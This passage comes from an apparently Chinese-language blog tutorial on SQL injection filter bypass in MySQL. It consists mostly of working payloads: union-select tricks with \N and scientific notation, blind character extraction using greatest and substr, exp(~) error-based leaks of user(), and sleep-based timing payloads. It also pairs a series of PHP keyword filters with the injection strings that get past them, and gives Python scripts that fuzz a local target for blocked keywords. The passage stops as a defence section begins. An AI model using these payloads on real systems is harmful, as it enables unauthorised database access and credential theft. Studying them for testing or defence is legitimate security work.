<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">\N其实相当于<span class="keyword">NULL</span>字符</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">8E0</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">0</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">8.0</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">0</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span>\Nunion <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span 
class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">0</span></span><br></pre></td></tr></table></div></figure>
<h4 id="18-特殊的绕过函数" >
<a href="#18-特殊的绕过函数" class="heading-link"><i class="fas fa-link"></i></a><a href="#18-特殊的绕过函数" class="headerlink" title="18 特殊的绕过函数"></a>18 特殊的绕过函数</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span> 通过greatest函数绕过不能使用大小于符号的情况</span><br><span class="line">greatest(a,b),返回a和b中较大的那个数。当我们要猜解<span class="keyword">user</span>()第一个字符的ascii码是否小于等于<span class="number">150</span>时,可使用:</span><br><span class="line">mysql<span class="operator">></span> <span class="keyword">select</span> greatest(ascii(mid(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>)),<span class="number">150</span>)<span class="operator">=</span><span class="number">150</span>; </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> greatest(ascii(mid(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>)),<span class="number">150</span>)<span class="operator">=</span><span class="number">150</span> <span class="operator">|</span> 
</span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> <span class="number">1</span> <span class="operator">|</span> </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line">如果小于<span class="number">150</span>,则上述返回值为<span class="literal">True</span>。</span><br><span class="line"></span><br><span class="line"><span class="number">2.</span> 通过substr函数绕过不能使用逗号的情况</span><br><span class="line">mid(<span class="keyword">user</span>() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)或substr(<span class="keyword">user</span>() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)</span><br><span class="line">mysql<span class="operator">></span> <span class="keyword">select</span> ascii(substr(<span class="keyword">user</span>() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)) <span class="operator"><</span> <span class="number">150</span>; </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> ascii(substr(<span class="keyword">user</span>() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)) <span class="operator"><</span> <span class="number">150</span> <span class="operator">|</span> </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> <span 
class="number">1</span> <span class="operator">|</span> </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"></span><br><span class="line"><span class="number">3.</span>使用数学运算函数在子查询中报错</span><br><span class="line"><span class="built_in">exp</span>(x)函数的作用: 取常数e的x次方,其中,e是自然对数的底。</span><br><span class="line"><span class="operator">~</span>x 是一个一元运算符,将x按位取补</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="built_in">exp</span>(<span class="operator">~</span>(<span class="keyword">select</span><span class="operator">*</span><span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a))mysql报错:</span><br><span class="line">mysql<span class="operator">></span> <span class="keyword">select</span> <span class="built_in">exp</span>(<span class="operator">~</span>(<span class="keyword">select</span><span class="operator">*</span><span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a));</span><br><span class="line">ERROR <span class="number">1690</span> (<span class="number">22003</span>): <span class="keyword">DOUBLE</span> <span class="keyword">value</span> <span class="keyword">is</span> <span class="keyword">out</span> <span class="keyword">of</span> <span class="keyword">range</span> <span class="keyword">in</span> ‘<span class="built_in">exp</span>(<span class="operator">~</span>((<span class="keyword">select</span> ‘root<span class="variable">@localhost</span>’ <span class="keyword">from</span> dual)))’</span><br><span class="line">这条查询会出错,是因为<span class="built_in">exp</span>(x)的参数x过大,超过了数值范围,分解到子查询,就是:(<span class="keyword">select</span><span class="operator">*</span><span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a) </span><br><span 
class="line">得到字符串 root<span class="variable">@localhost</span>表达式’root<span class="variable">@localhost</span>’被转换为<span class="number">0</span>,按位取补之后得到一个非常的大数,它是MySQL中最大的无符号整数</span><br></pre></td></tr></table></div></figure>
<h4 id="mysql黑魔法绕过" >
<a href="#mysql黑魔法绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#mysql黑魔法绕过" class="headerlink" title="mysql黑魔法绕过"></a>mysql黑魔法绕过</h4>
<p>select{x user}from {x mysql.user};</p>
<p><img src="../../../picture/141835089891859.png" alt="img"></p>
<p> select user from mysql.user where 1=\Nunion select@1;</p>
<p>select user from mysql.user where 1=\Nunion select-.1;</p>
<p>select~2.1from xxxx</p>
<p>select-2.1from xxx</p>
<p>select~2e1from xxx</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if((select%0b(select(xxx)``from(xxx))regexp(0x5e61)),(`sleep`(5)),0)</span><br></pre></td></tr></table></div></figure>
<h3 id="2、过滤闭合" >
<a href="#2、过滤闭合" class="heading-link"><i class="fas fa-link"></i></a><a href="#2、过滤闭合" class="headerlink" title="2、过滤闭合"></a>2、过滤闭合</h3>
<h4 id="1-过滤关键字" >
<a href="#1-过滤关键字" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-过滤关键字" class="headerlink" title="1 过滤关键字"></a>1 过滤关键字</h4>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span 
class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> 过滤关键字 <span class="keyword">and</span> <span class="keyword">or</span></span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> <span class="keyword">or</span> <span class="number">1</span>=<span class="number">1</span> <span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">1</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> || <span class="number">1</span>=<span class="number">1</span> <span class="number">1</span> && <span class="number">1</span>=<span 
class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="number">2</span> 过滤关键字 <span class="keyword">and</span> <span class="keyword">or</span> union</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 union select user,password <span class="keyword">from</span> users</span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select user <span class="keyword">from</span> users where userid=<span class="number">1</span>)=<span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"><span class="number">3</span> 过滤关键字 <span class="keyword">and</span> <span class="keyword">or</span> union where</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select user <span class="keyword">from</span> users where user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select user <span class="keyword">from</span> users limit <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"><span class="number">4</span> 过滤关键字 <span class="keyword">and</span> <span class="keyword">or</span> union where</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select user <span 
class="keyword">from</span> users where user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select user <span class="keyword">from</span> users limit <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"><span class="number">5</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where|limit)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select user <span class="keyword">from</span> users limit <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select user <span class="keyword">from</span> users group by user_id having user_id = <span class="number">1</span>) = <span class="string">'admin'</span><span class="comment">#user_id聚合中user_id为1的user为admin</span></span><br><span class="line"></span><br><span class="line"><span class="number">6</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit, group by</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where|limit|group by)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select user <span class="keyword">from</span> users group by user_id having user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select 
substr(group_concat(user_id),<span class="number">1</span>,<span class="number">1</span>) user <span class="keyword">from</span> users ) = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="number">7</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit, group by, select</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where|limit|group by|select)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select substr(gruop_concat(user_id),<span class="number">1</span>,<span class="number">1</span>) user <span class="keyword">from</span> users) = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && substr(user,<span class="number">1</span>,<span class="number">1</span>) = <span class="string">'a'</span></span><br><span class="line"></span><br><span class="line"><span class="number">8</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit, group by, select, <span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> php代码 preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|union|where|limit|group by|select|\<span class="string">')/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select substr(gruop_concat(user_id),<span class="number">1</span>,<span class="number">1</span>) user <span class="keyword">from</span> users) = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && user_id is not <span 
class="literal">null</span> <span class="number">1</span> && substr(user,<span class="number">1</span>,<span class="number">1</span>) = <span class="number">0x61</span> <span class="number">1</span> && substr(user,<span class="number">1</span>,<span class="number">1</span>) = unhex(<span class="number">61</span>)</span><br><span class="line"></span><br><span class="line"><span class="number">9</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit, group by, select, <span class="string">', hex</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> php代码 preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|union|where|limit|group by|select|\<span class="string">'|hex)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && substr(user,<span class="number">1</span>,<span class="number">1</span>) = unhex(<span class="number">61</span>)</span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> &&substr(user,<span class="number">1</span>,<span class="number">1</span>) =lower(conv(<span class="number">11</span>,<span class="number">10</span>,<span class="number">16</span>)) <span class="comment">#十进制的11转化为十六进制,并小写。</span></span><br><span class="line"></span><br><span class="line"><span class="number">10</span> 过滤关键字<span class="keyword">and</span>,<span class="keyword">or</span>,union,where,limit,groupby,select,<span class="string">', hex, substr</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> php代码 preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|union|where|limit|groupby|select|\<span class="string">'|hex|substr)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span 
class="line"> 会过滤的攻击代码 <span class="number">1</span> &&substr(user,<span class="number">1</span>,<span class="number">1</span>) =lower(conv(<span class="number">11</span>,<span class="number">10</span>,<span class="number">16</span>))/td></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> &&lpad(user,<span class="number">7</span>,<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="number">11</span> 过滤关键字<span class="keyword">and</span>,<span class="keyword">or</span>,union,where,limit,groupby,select,<span class="string">', hex, substr, 空格</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> php代码 preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|union|where|limit|groupby|select|\<span class="string">'|hex|substr|\s)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> &&lpad(user,<span class="number">7</span>,<span class="number">1</span>)/td></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span>%<span class="number">0</span>b||%<span class="number">0</span>blpad(user,<span class="number">7</span>,<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="number">12</span> 过滤关键字andorunionwhere</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> || (selectuserfromuserswhereuser_id = <span class="number">1</span>) =<span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> || (selectuserfromuserslimit1) =<span 
class="string">'admin'</span></span><br></pre></td></tr></table></div></figure>
<h2 id="0x03-FUZZ" >
<a href="#0x03-FUZZ" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x03-FUZZ" class="headerlink" title="0x03 FUZZ"></a>0x03 FUZZ</h2>
<h3 id="1-过滤字符的FUZZ" >
<a href="#1-过滤字符的FUZZ" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-过滤字符的FUZZ" class="headerlink" title="1 过滤字符的FUZZ"></a>1 过滤字符的FUZZ</h3>
<p>get(注意:下面的脚本把待测字符直接拼进 URL。<code>#</code> 会被 HTTP 客户端当作 fragment 而不会发送给服务端,<code>&amp;</code> 和 <code>=</code> 会被当作参数分隔符,这三项的"通过/非法"结论是不可信的。应改为 <code>requests.get(url, params={'query': char, 'submit2': 'sbumit'})</code>,让 requests 做百分号编码。另外 <code>'Illegal Char'</code> 这个判定字符串只对该靶场有效,换目标时要改成目标自己的拦截特征。)</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">sql_char = [<span 
class="string">'select'</span>,</span><br><span class="line"> <span class="string">'union'</span>,</span><br><span class="line"> <span class="string">'and'</span>,</span><br><span class="line"> <span class="string">'or'</span>,</span><br><span class="line"> <span class="string">'sleep'</span>,</span><br><span class="line"> <span class="string">'where'</span>,</span><br><span class="line"> <span class="string">'from'</span>,</span><br><span class="line"> <span class="string">'limit'</span>,</span><br><span class="line"> <span class="string">'group'</span>,</span><br><span class="line"> <span class="string">'by'</span>,</span><br><span class="line"> <span class="string">'like'</span>,</span><br><span class="line"> <span class="string">'prepare'</span>,</span><br><span class="line"> <span class="string">'as'</span>,</span><br><span class="line"> <span class="string">'if'</span>,</span><br><span class="line"> <span class="string">'char'</span>,</span><br><span class="line"> <span class="string">'ascii'</span>,</span><br><span class="line"> <span class="string">'mid'</span>,</span><br><span class="line"> <span class="string">'left'</span>,</span><br><span class="line"> <span class="string">'right'</span>,</span><br><span class="line"> <span class="string">'substring'</span>,</span><br><span class="line"> <span class="string">'handler'</span>,</span><br><span class="line"> <span class="string">'updatexml'</span>,</span><br><span class="line"> <span class="string">'extractvalue'</span>,</span><br><span class="line"> <span class="string">'benchmark'</span>,</span><br><span class="line"> <span class="string">'insert'</span>,</span><br><span class="line"> <span class="string">'update'</span>,</span><br><span class="line"> <span class="string">'all'</span>,</span><br><span class="line"> <span class="string">'@'</span>,</span><br><span class="line"> <span class="string">'#'</span>,</span><br><span class="line"> <span class="string">'^'</span>,</span><br><span class="line"> 
<span class="string">'&'</span>,</span><br><span class="line"> <span class="string">'*'</span>,</span><br><span class="line"> <span class="string">'\''</span>,</span><br><span class="line"> <span class="string">'"'</span>,</span><br><span class="line"> <span class="string">'~'</span>,</span><br><span class="line"> <span class="string">'`'</span>,</span><br><span class="line"> <span class="string">'('</span>,</span><br><span class="line"> <span class="string">')'</span>,</span><br><span class="line"> <span class="string">'--'</span>,</span><br><span class="line"> <span class="string">'='</span>,</span><br><span class="line"> <span class="string">'/'</span>,</span><br><span class="line"> <span class="string">'\\'</span>,</span><br><span class="line"> <span class="string">' '</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> char <span class="keyword">in</span> sql_char:</span><br><span class="line"> res = requests.get(<span class="string">"http://127.0.0.1/get.php?query="</span>+char+<span class="string">"&submit2=sbumit"</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">'Illegal Char'</span> <span class="keyword">in</span> res.text:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"该字符是非法字符: {0}"</span>.<span class="built_in">format</span>(char))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"通过: {0}"</span>.<span class="built_in">format</span>(char))</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>post(同样的问题:<code>post_data</code> 是手工拼接的裸字符串,<code>&amp;</code>、<code>=</code> 等字符会破坏 <code>application/x-www-form-urlencoded</code> 的解析,服务端收到的并不是要测的字符。应改为 <code>requests.post(url, data={'query': 'test' + char, 'submit2': 'sbumit'}, headers=header)</code>,由 requests 完成编码并自动设置 Content-Type;<code>Host</code> 头也无需手工指定。)</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span 
class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">sql_char = [<span class="string">'select'</span>,</span><br><span class="line"> <span class="string">'union'</span>,</span><br><span class="line"> <span class="string">'and'</span>,</span><br><span class="line"> <span class="string">'or'</span>,</span><br><span class="line"> <span class="string">'sleep'</span>,</span><br><span class="line"> <span class="string">'where'</span>,</span><br><span class="line"> <span class="string">'from'</span>,</span><br><span class="line"> <span class="string">'limit'</span>,</span><br><span class="line"> <span class="string">'group'</span>,</span><br><span class="line"> <span class="string">'by'</span>,</span><br><span class="line"> <span class="string">'like'</span>,</span><br><span class="line"> <span class="string">'prepare'</span>,</span><br><span class="line"> <span class="string">'as'</span>,</span><br><span class="line"> <span class="string">'if'</span>,</span><br><span class="line"> <span class="string">'char'</span>,</span><br><span class="line"> <span class="string">'ascii'</span>,</span><br><span class="line"> <span class="string">'mid'</span>,</span><br><span class="line"> <span class="string">'left'</span>,</span><br><span class="line"> <span class="string">'right'</span>,</span><br><span class="line"> <span class="string">'substring'</span>,</span><br><span class="line"> <span class="string">'handler'</span>,</span><br><span class="line"> <span class="string">'updatexml'</span>,</span><br><span class="line"> <span class="string">'extractvalue'</span>,</span><br><span class="line"> <span class="string">'benchmark'</span>,</span><br><span class="line"> <span class="string">'insert'</span>,</span><br><span class="line"> <span class="string">'update'</span>,</span><br><span 
class="line"> <span class="string">'all'</span>,</span><br><span class="line"> <span class="string">'@'</span>,</span><br><span class="line"> <span class="string">'#'</span>,</span><br><span class="line"> <span class="string">'^'</span>,</span><br><span class="line"> <span class="string">'&'</span>,</span><br><span class="line"> <span class="string">'*'</span>,</span><br><span class="line"> <span class="string">'\''</span>,</span><br><span class="line"> <span class="string">'"'</span>,</span><br><span class="line"> <span class="string">'~'</span>,</span><br><span class="line"> <span class="string">'`'</span>,</span><br><span class="line"> <span class="string">'('</span>,</span><br><span class="line"> <span class="string">')'</span>,</span><br><span class="line"> <span class="string">'--'</span>,</span><br><span class="line"> <span class="string">'='</span>,</span><br><span class="line"> <span class="string">'/'</span>,</span><br><span class="line"> <span class="string">'\\'</span>,</span><br><span class="line"> <span class="string">' '</span>]</span><br><span class="line">url = <span class="string">"http://127.0.0.1/get.php"</span></span><br><span class="line">header = {</span><br><span class="line"> <span class="string">'Host'</span>:<span class="string">'127.0.0.1'</span>,</span><br><span class="line"> <span class="string">'User-Agent'</span>:<span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'</span>,</span><br><span class="line"> <span class="string">'Accept'</span>:<span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'</span>,</span><br><span class="line"> <span class="string">'Accept-Language'</span>:<span class="string">'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'</span>,</span><br><span class="line"> <span class="string">'Accept-Encoding'</span>:<span class="string">'gzip, deflate'</span>,</span><br><span class="line"> <span 
class="string">'Content-Type'</span>:<span class="string">'application/x-www-form-urlencoded'</span></span><br><span class="line">}</span><br><span class="line"><span class="keyword">for</span> char <span class="keyword">in</span> sql_char:</span><br><span class="line"> post_data = <span class="string">"query=test"</span>+char+<span class="string">"&submit2=sbumit"</span></span><br><span class="line"> res = requests.post(url,data=post_data,headers=header)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">'Illegal Char'</span> <span class="keyword">in</span> res.text:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"该字符是非法字符: {0}"</span>.<span class="built_in">format</span>(char))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"通过: {0}"</span>.<span class="built_in">format</span>(char))</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<h2 id="etc1-SQL注入的防御" >
<a href="#etc1-SQL注入的防御" class="heading-link"><i class="fas fa-link"></i></a><a href="#etc1-SQL注入的防御" class="headerlink" title="etc1 SQL注入的防御"></a>etc1 SQL注入的防御</h2>
<h3 id="1、检查变量数据类型和格式" >
<a href="#1、检查变量数据类型和格式" class="heading-link"><i class="fas fa-link"></i></a><a href="#1、检查变量数据类型和格式" class="headerlink" title="1、检查变量数据类型和格式"></a><strong>1、检查变量数据类型和格式</strong></h3>
